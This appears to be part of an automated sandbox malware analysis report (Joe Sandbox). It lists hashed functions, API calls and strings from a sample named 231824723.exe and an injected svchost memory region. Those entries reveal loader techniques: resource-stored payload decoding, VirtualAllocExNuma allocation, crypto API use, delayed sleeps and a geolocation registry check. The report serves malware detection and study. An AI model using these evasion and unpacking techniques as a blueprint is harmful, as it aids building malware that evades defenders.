Opcode Fuzzy Hash: 28863a2996926e595d567d9808cc3097754cd4f81bb14fd5d3bcab1d227364b9
Instruction Fuzzy Hash: 1FD1BE3121CB488FD7A4EB28D89576BB3E2FB95310F548A2DE58AC3251DF70D845C782

Uniqueness

Uniqueness Score: -1.00%

Function 00064370, Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30ac39a9720abbe45aca3ebe190da487c005de3a296c465f539d3b02ea57e680
Instruction ID: 902043d08873cb04429498ea70eeb8579fda3630cff70ee682cc0680d6e1a211
Opcode Fuzzy Hash: 30ac39a9720abbe45aca3ebe190da487c005de3a296c465f539d3b02ea57e680
Instruction Fuzzy Hash: 32916E139ADEF54AC72E0A3C58951B1BBD2EAA731535E03EDDCDBCB283C815984BC194

Uniqueness

Uniqueness Score: -1.00%

Function 0006BD80, Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c04d2da153e4daa3a90fe94dff0253daba56e3120d16523f9b70fb24ce37baed
Instruction ID: 71236af602337b865bd910ffa41f72a10469b3d4a544cf1df8f12ee1ae33c0ee
Opcode Fuzzy Hash: c04d2da153e4daa3a90fe94dff0253daba56e3120d16523f9b70fb24ce37baed
Instruction Fuzzy Hash: 12B12B60518B1C8AE775AF14D884BFA73D2FF55304F50416ED486CB1B2EF7A9885C781

Uniqueness

Uniqueness Score: -1.00%

Function 00070EF0, Relevance: .3, Instructions: 340COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 611256386d79d3d0d06c4297b2e5b0e3dd40b3a84c471bfab61f0d4c8ff58318
Instruction ID: 39fac86eab9a3b14f388649f0dd57c51ece11827bebbc3b94b5b3627a6aa2095
Opcode Fuzzy Hash: 611256386d79d3d0d06c4297b2e5b0e3dd40b3a84c471bfab61f0d4c8ff58318
Instruction Fuzzy Hash: 3D91F930B18A4C4BEBA8B76C98457FD72D5EB99350F44C229E54EC32D2DE6CDC818789

Uniqueness

Uniqueness Score: -1.00%

Function 0006A480, Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71108cfca951854983913d8969ecd2bd5a971f7a0e5daad93c1b405c67c0f827
Instruction ID: 1ce9c44f9102aec063489f7dff22be1e414653d55584c1034d7b6c2382d729e9
Opcode Fuzzy Hash: 71108cfca951854983913d8969ecd2bd5a971f7a0e5daad93c1b405c67c0f827
Instruction Fuzzy Hash: 14913031B1CB584FD7A4EF28945576BB6E2FBC9700F50892EE18ED3255CE3498428B87

Uniqueness

Uniqueness Score: -1.00%

Function 00077650, Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 383e60ae6bc82cbb3227383ca093adc164f326803fa47dddefdbbf4f63910728
Instruction ID: 191107f83a9aab1acdab4bd125d95d3c5a71ff06d2b1a39f9649f408eb605e7f
Opcode Fuzzy Hash: 383e60ae6bc82cbb3227383ca093adc164f326803fa47dddefdbbf4f63910728
Instruction Fuzzy Hash: 16915071A1CB584FD7A4EB28944576BB7E1FBC8740F50852EE18EC3255DE38D8428B87

Uniqueness

Uniqueness Score: -1.00%

Function 0007D190, Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84001c21deeaa085a34030257c57640888d70deced4bd599c65c28721ab1fe13
Instruction ID: 6cbb26bb9aaf6e9a9cac2e9824cc94f40af987fe634081f71f242be43ee26031
Opcode Fuzzy Hash: 84001c21deeaa085a34030257c57640888d70deced4bd599c65c28721ab1fe13
Instruction Fuzzy Hash: D581B971A18B1D8FC768EF1C9881676B3E1FF99310F55422EE48EC3241EA24E952C7C6

Uniqueness

Uniqueness Score: -1.00%

Function 00071270, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fabdac14c32df1d43972f6d5f8f3d9a54bc22d7a387abedd7481d691bf7f96d
Instruction ID: 8dcdfb7a9616d4dfe7dc98a26f79e21baa73e4247ca5b7232220f6cf50274046
Opcode Fuzzy Hash: 9fabdac14c32df1d43972f6d5f8f3d9a54bc22d7a387abedd7481d691bf7f96d
Instruction Fuzzy Hash: 5261A93070CB084FD768EB2D94557FAB3D2FB85300F50861EE48FC3192EE68D946868A

Uniqueness

Uniqueness Score: -1.00%

Function 000727E0, Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5de8a471fb38fc3774644abba8d83a67f89eb4f0943e814748926cc979d928ae
Instruction ID: 157566d102a46f66a1644267140c59cde08315349a6ceab0720cf6be191a15bf
Opcode Fuzzy Hash: 5de8a471fb38fc3774644abba8d83a67f89eb4f0943e814748926cc979d928ae
Instruction Fuzzy Hash: 4D716C31A18B854BD3A9DB2884583BBB7D2EFD5304F58C67DD489C7251EA3984468386

Uniqueness

Uniqueness Score: -1.00%

Function 000754B0, Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4560f69cde0a8aa422e39bf9c21fdd805002a0c76b25dc1ff3f8875b83ebb00e
Instruction ID: 26ab876802081ba4028e24878d8ba550dc917e584c0fbf5542bf6edd68ba5dc9
Opcode Fuzzy Hash: 4560f69cde0a8aa422e39bf9c21fdd805002a0c76b25dc1ff3f8875b83ebb00e
Instruction Fuzzy Hash: 5B519B21B14E090B96D8BB6D58567FE72C3FBD9311F94816DE44EC3343DE999C42428A

Uniqueness

Uniqueness Score: -1.00%

Function 0006E760, Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecbe5b38f90175e939fb9afb2d5850bf26725d00cc70c95c0608616a4e17637
Instruction ID: dc537e4e3c2dd5b86941253c17ae9915228f926860a01d16895abcf9e82127ea
Opcode Fuzzy Hash: eecbe5b38f90175e939fb9afb2d5850bf26725d00cc70c95c0608616a4e17637
Instruction Fuzzy Hash: A1718E34618B198FDB94EF28C484B6AB7E2FF99300F5545ADE44EC7265DB35D840CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00066660, Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a29dafd65cb80882e3f0bc5b87415c9ba5c6325e43ac1f1f9b31bf1b0a55bc82
Instruction ID: 62f2684a0667d11cab69a04b168ef2deea207f1a9aade7e8324de9f271675d57
Opcode Fuzzy Hash: a29dafd65cb80882e3f0bc5b87415c9ba5c6325e43ac1f1f9b31bf1b0a55bc82
Instruction Fuzzy Hash: FF51223061CE194FD7A8EB68D896B7BB3D3FBD9314F5402ADE44AC3152DE26DC418282

Uniqueness

Uniqueness Score: -1.00%

Function 000756E0, Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f64a5c436a7e57e9279d3205597f46567704a0a92cb0092ee7492c1c3c7de00c
Instruction ID: 6f6588557511891e5b8874a4d943a5eadc510160afe4cb5140a66b8ac2bbce65
Opcode Fuzzy Hash: f64a5c436a7e57e9279d3205597f46567704a0a92cb0092ee7492c1c3c7de00c
Instruction Fuzzy Hash: BB613730A18F494FE399A73C88447F673C2FB99325F54876DE46EC32E2DE689841C256

Uniqueness

Uniqueness Score: -1.00%

Function 00070660, Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ba3ee075efa76e15dc1480a090945bd1d4396a6112486fedf5d80ab5da8b0ee
Instruction ID: 8201f2db72fb269b5017d1adadf2b03fcd510cf7e9ad5f90699fb4085c66148e
Opcode Fuzzy Hash: 2ba3ee075efa76e15dc1480a090945bd1d4396a6112486fedf5d80ab5da8b0ee
Instruction Fuzzy Hash: BC519330A1CB498BD7E89B19D8557BEB6D2FBC5310F50862DE48EC3252DE78D841C687

Uniqueness

Uniqueness Score: -1.00%

Function 00068CD0, Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ae90f79837624fabe1971db2763c4975c5c1e5505e9ec46a07440c5f42fd215
Instruction ID: 5a2009785cba66c241553d4f3f99f6f826d2754cea87cd66d804fecf9e1d084e
Opcode Fuzzy Hash: 3ae90f79837624fabe1971db2763c4975c5c1e5505e9ec46a07440c5f42fd215
Instruction Fuzzy Hash: B551B33160CA184FD7A8EB58D895A7A73D7FBD8320F44826DE48EC3251DE35DD428781

Uniqueness

Uniqueness Score: -1.00%

Function 000737D0, Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf42dd45d8e72ee7aa6c945c910b6a2570162e206fd23d0ac4934cb70336b891
Instruction ID: 15b4454200e4507e44da8236ff97085274fc48a7feebb141ac626038b51ccd3d
Opcode Fuzzy Hash: cf42dd45d8e72ee7aa6c945c910b6a2570162e206fd23d0ac4934cb70336b891
Instruction Fuzzy Hash: 0651591596D7D149E32E623C14952F6EFC1CBAB30CF1C566DE9CED3243C41A860B938A

Uniqueness

Uniqueness Score: -1.00%

Function 000782C0, Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8d92e659c2e8ff31b9d83b6547942138191f0da5eec73a28f888948d536b0a1
Instruction ID: 9c3e86b51c539a79c0dcb0d14ca65e1e48bdc2eaeeac6a5d7f3465789076ab97
Opcode Fuzzy Hash: a8d92e659c2e8ff31b9d83b6547942138191f0da5eec73a28f888948d536b0a1
Instruction Fuzzy Hash: 1951D83166CA0D4FE3A5AB29D84D6BB72D1FB85310F40862DD48FC3161EF7899468785

Uniqueness

Uniqueness Score: -1.00%

Function 00072FD0, Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21bc741f3d442541668153a169047edcf88b2b9f35b5c7e9e126047166bb553e
Instruction ID: a305098f5c07ec1771b549b8d6f64dff9105432e2f005ce3e625d87839bf5cb7
Opcode Fuzzy Hash: 21bc741f3d442541668153a169047edcf88b2b9f35b5c7e9e126047166bb553e
Instruction Fuzzy Hash: FE51361196D6D109E32A623C04952F7AFC5DBAF708F295AADD8CFC3243C40E890B9386

Uniqueness

Uniqueness Score: -1.00%

Function 0007C2F0, Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a0ffa18968c7150c23cf6e2ff002537f1bc1f435cdb5d6a3ac2367191e00ed8
Instruction ID: 288ef4b2f4ddbd9cb6a20649237a82ffbe75e812543e8cbe20c296b76ef82c47
Opcode Fuzzy Hash: 9a0ffa18968c7150c23cf6e2ff002537f1bc1f435cdb5d6a3ac2367191e00ed8
Instruction Fuzzy Hash: 9F51717161CB084FEBA8DF2CD854B6ABBE5FB99701F04856EA44EC3251DB38D8418B85

Uniqueness

Uniqueness Score: -1.00%

Function 00065950, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.55326871758.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d49dd1821f7094e83cfe70a090025814297c5efe4a8c7aaf9d498475aeefbc3e
Instruction ID: 6f2fa59480a6462bc83ecce7e658ec3e51bbf2d51e7646f5f89c5a7ad149bd83
Opcode Fuzzy Hash: d49dd1821f7094e83cfe70a090025814297c5efe4a8c7aaf9d498475aeefbc3e
Instruction Fuzzy Hash: 6EB01234A014040B8B0C36754D8F2D434A09388009B844028B806C0754E78D00965A53

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 231824723.exe PID: 3088 Parent PID: 3388 231824723.exeCOMMON

Execution Graph

Execution Coverage:	33.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.7%
Total number of Nodes:	295
Total number of Limit Nodes:	8

Executed Functions

Function 004013F6, Relevance: 42.2, APIs: 12, Strings: 12, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004013FB
strlen.MSVCRT ref: 00401420

Part of subcall function 004012C6: _EH_prolog.MSVCRT ref: 004012CB

FindResourceA.KERNEL32(00000000,0096B91B,MONDAY), ref: 00401515
strlen.MSVCRT ref: 00401534

Strings

qMc}H*YTr}|Q816n99oZTxe{09c@45, xrefs: 00401453
memcpy, xrefs: 004014EF
LockResource, xrefs: 004014B3
MONDAY, xrefs: 0040150A
GetCurrentProcess, xrefs: 004014DB
UBk13VZ596kw0Z0Qkzj54iNK9pycb30ychPO35v1HY, xrefs: 0040152B, 00401533, 0040153E
NTDLL.DLL, xrefs: 004014F4
SizeofResource, xrefs: 0040149F
VirtualAllocExNuma, xrefs: 004014C7
LoadResource, xrefs: 0040148C
KERNEL32.DLL, xrefs: 00401470, 0040147A, 00401491, 004014A4, 004014B8, 004014CC, 004014E0
FindResourceA, xrefs: 00401475

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: H_prologstrlen$FindResource
String ID: FindResourceA$GetCurrentProcess$KERNEL32.DLL$LoadResource$LockResource$MONDAY$NTDLL.DLL$SizeofResource$UBk13VZ596kw0Z0Qkzj54iNK9pycb30ychPO35v1HY$VirtualAllocExNuma$memcpy$qMc}H*YTr}|Q816n99oZTxe{09c@45
API String ID: 3946776721-656568986
Opcode ID: 194ba3be7d00c73da5166ac3202e765bc04cbf17e9fb32197062cbda1ef8e392
Instruction ID: 1b1daef6d0aa63b0f3bb7f007b131c8894d4578df78689f0a216841b84fa7b26
Opcode Fuzzy Hash: 194ba3be7d00c73da5166ac3202e765bc04cbf17e9fb32197062cbda1ef8e392
Instruction Fuzzy Hash: 97614F71C00219ABDF10ABE59D4AAEFBBBCEF48304F10447BF505B7192D6B959058BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040276C, Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 00402799
__p__fmode.MSVCRT ref: 004027AE
__p__commode.MSVCRT ref: 004027BC
__setusermatherr.MSVCRT ref: 004027E8
_initterm.MSVCRT ref: 004027FE
__getmainargs.MSVCRT ref: 00402821
_initterm.MSVCRT ref: 00402831
GetStartupInfoA.KERNEL32 ref: 00402870
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402894
exit.MSVCRT ref: 004028A4
_XcptFilter.MSVCRT ref: 004028B6

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 1160cdad416f4276a3a3e6d0b6e7166148041f2eab0252b07ea06657ef556364
Instruction ID: 84b94a3c6fc318e2c7d763bd1f636a3eb878853c8358bca2aff81c2abcbc1e6f
Opcode Fuzzy Hash: 1160cdad416f4276a3a3e6d0b6e7166148041f2eab0252b07ea06657ef556364
Instruction Fuzzy Hash: 64418176800758AFDB20AFA4DE49A9A7BBCFB09711F20423FE441B72D1D7B84941DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004012C6, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004012CB
?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 004012EE
wcslen.MSVCRT ref: 004012FA
?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(CRYPT32.DLL,00000000), ref: 00401306
LoadLibraryW.KERNEL32(?,CryptStringToBinaryA), ref: 00401321
malloc.MSVCRT ref: 00401348
?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401371

Strings

CryptStringToBinaryA, xrefs: 0040131B
CRYPT32.DLL, xrefs: 004012F4, 004012F9, 00401302

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@$?assign@?$basic_string@H_prologLibraryLoadV12@mallocwcslen
String ID: CRYPT32.DLL$CryptStringToBinaryA
API String ID: 1769444517-4003543915
Opcode ID: 4bd682fd284dafd6b3d69e501325326813351942735f88ee07fc1407d81f4d4a
Instruction ID: e1e9578958d8e8c1af23e9efcfde6ea73bfd28b9b3e41177363c2057de3328dc
Opcode Fuzzy Hash: 4bd682fd284dafd6b3d69e501325326813351942735f88ee07fc1407d81f4d4a
Instruction Fuzzy Hash: 7E213AB5901209AFDB10AF64DD89DEF7B7CEB09351F10406AF912B22E0C7758E05CB68

Uniqueness

Uniqueness Score: -1.00%

Function 003FE8BB, Relevance: 9.0, APIs: 6, Instructions: 37
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32 ref: 003FE8BD
CommandLineToArgvW.SHELL32(00000000,003FEFEC), ref: 003FE8C9
GetStartupInfoW.KERNEL32(003FEFF4), ref: 003FE8F6
Sleep.KERNELBASE(000003E8,0000000C,00000017,00000032), ref: 003FE923
Sleep.KERNEL32(000084D0,0000000C,00000017,00000032), ref: 003FE937
ExitProcess.KERNEL32 ref: 003FE93F

Memory Dump Source

Source File: 00000011.00000002.55332658544.00000000003D1000.00000040.00000001.sdmp, Offset: 003D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_3d1000_231824723.jbxd

Similarity

API ID: CommandLineSleep$ArgvExitInfoProcessStartup
String ID:
API String ID: 2884962887-0
Opcode ID: 3b2e34cd317b7e39f850c29a5c4d0a3f81ed2f69906a09ced36f67c75f0fa09d
Instruction ID: 3156fc4fea2dca2135108e10c6adc8fd9996ad25b7a31264e6a5264b99d9229a
Opcode Fuzzy Hash: 3b2e34cd317b7e39f850c29a5c4d0a3f81ed2f69906a09ced36f67c75f0fa09d
Instruction Fuzzy Hash: 0B01C971544346BFE3127BE4AD4AF7976ACAF04745F060426FB459A2E2DFB48404CB26

Uniqueness

Uniqueness Score: -1.00%

Function 00240000, Relevance: 9.0, Strings: 7, Instructions: 249
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CryptCreateHash, xrefs: 00240211, 00240214
CryptDeriveKey, xrefs: 0024024F, 00240252
CryptAcquireContextA, xrefs: 002401F2, 002401F5
CryptEncrypt, xrefs: 0024026E, 00240271
tEncrypt, xrefs: 002402EB, 002402EE
CryptHashData, xrefs: 00240230, 00240233
rypt, xrefs: 002402EF, 002402F2

Memory Dump Source

Source File: 00000011.00000002.55332525789.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_240000_231824723.jbxd

Similarity

API ID:
String ID: CryptAcquireContextA$CryptCreateHash$CryptDeriveKey$CryptEncrypt$CryptHashData$rypt$tEncrypt
API String ID: 0-299839648
Opcode ID: 28ff45b24469f5f2112780e45f7afa2a5872612da5b2b81f99d34a07dca220fd
Instruction ID: c34e569064228fe53f0fea5ee8eeb3eed1ad152ac9b08727ad4b96f39bd5c319
Opcode Fuzzy Hash: 28ff45b24469f5f2112780e45f7afa2a5872612da5b2b81f99d34a07dca220fd
Instruction Fuzzy Hash: 68C13E60D183C8D9EB11CBE4D8487DEBFB55F26708F084198E2487B282D7FE5A58C766

Uniqueness

Uniqueness Score: -1.00%

Function 002F002D, Relevance: 4.9, APIs: 3, Instructions: 392
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,002F0005), ref: 002F00EB
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,002F0005), ref: 002F0113

Memory Dump Source

Source File: 00000011.00000002.55332549540.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2f0000_231824723.jbxd

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID:
API String ID: 2032221330-0
Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
Instruction ID: 0b1ee123c2b17a1feaffd17140619f32a7ff89144dbe6d9a772cc75e58e43eaa
Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
Instruction Fuzzy Hash: 41E1BF71A1430A8FDB24CF59C88473AF3E0BF94398F18453DEA859B242E774E865CB91

Uniqueness

Uniqueness Score: -1.00%

Function 004012A1, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32 ref: 004012B8

Strings

Control Panel\International\Geo, xrefs: 004012AE

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: Open
String ID: Control Panel\International\Geo
API String ID: 71445658-536101429
Opcode ID: f2ca80afcd04f363ed8b3c2d820b5acf091907ca4149591c099e708eb7090943
Instruction ID: 623ab5b53b3c2058ffd3ed1b555fc8586722e231771353ed3acda7d84113b206
Opcode Fuzzy Hash: f2ca80afcd04f363ed8b3c2d820b5acf091907ca4149591c099e708eb7090943
Instruction Fuzzy Hash: AEC08C752C03147EE6100760AC03FAA3748E704B02F30012E7207B24C2C2A000084564

Uniqueness

Uniqueness Score: -1.00%

Function 0040270E, Relevance: 3.0, APIs: 2, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_onexit.MSVCRT ref: 0040271B
__dllonexit.MSVCRT ref: 00402731

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: __dllonexit_onexit
String ID:
API String ID: 2384194067-0
Opcode ID: 41168e6eb0db04b6aa9ae4de840d0b552f203041acba80f05aeaa2b6b2dc4cd9
Instruction ID: df4ba6893ca0cac78af7f652cc5d7df2cd035058c053ba143f67e89a2da5bba8
Opcode Fuzzy Hash: 41168e6eb0db04b6aa9ae4de840d0b552f203041acba80f05aeaa2b6b2dc4cd9
Instruction Fuzzy Hash: 6CC01231450610AACA057B10FE0A7867711EBD0737B70C77AF065300F187790A54ADAE

Uniqueness

Uniqueness Score: -1.00%

Function 00401268, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401276

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

